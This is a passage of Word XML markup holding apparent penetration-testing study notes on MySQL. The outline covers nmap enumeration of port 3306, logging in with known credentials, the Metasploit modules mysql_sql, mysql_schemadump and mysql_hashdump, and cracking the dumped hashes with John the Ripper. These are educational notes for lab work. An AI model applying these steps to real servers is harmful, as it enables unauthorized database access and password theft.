    <w:p w14:paraId="2064AEEE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>The server will respond to the client with whatever information has been requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197987F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What runs MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC22BFF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Linux, Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171EAE5B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Commonly used as </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>a back end database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F138EEF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Essential component of LAMP stack (Linux, Apache, MySQL, PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5F314D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF345F0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>When you would begin attacking MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF08D8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Likely not going to be the first point for getting initial information about the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92F54C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Can attempt to bruteforce but unlikely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D9529A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>The Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A42D0AA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Typically have gained some initial credentials from enumerating other services used to enumerate and exploit MySQL service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404BC0D5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Assumption of the discovery “root:password” while enumerating subdomains of a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35317243" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Typically after unsuccessful ssh login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F947BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41D782" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Need MySQL installed on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF55265" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7066C10F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31094A85" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Nmaps mysql-enum script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CA3B6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Nmap -A -p- -vv &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A15D53" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Port 3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D861BAF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check credentials with mysql -h &lt;ip&gt; -u &lt;username&gt; -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE0DCF2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1988F7A0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Mysql_sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36906215" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PASSWORD, RHOSTS, USERNAME, SQL (change to show databases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F98DE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68634C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search for version – select module()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B654F9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploiting MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E67952" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>At this point, MySQL server credentials are known</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C926B8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Version of MySQL running is known</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF11DA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>The number of Databases and names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC83BA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Key Terminology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531664DD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D285A83" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30252078" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Can substitute schema instead of database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B5D02" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Not all database products use interchangeable terminology (such as Oracle Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BDF29" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317CDBAC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Product of cryptographic algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E041CAB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Can be used to index data into a hash table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECC9507" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Each hash has unique ID that serves as a pointer to original data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297DFD45" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Creates smaller index, faster and more efficient search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169FDBB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search for mysql_schemadump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37DB95" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Set options and exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEFA525" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search for mysql_hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F30E5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Set options and exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D237A5D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find users and password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251A0BF7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Copy hash string (from name to end) to text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349D5D3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Run JohntheRipper against it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729CEA59" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
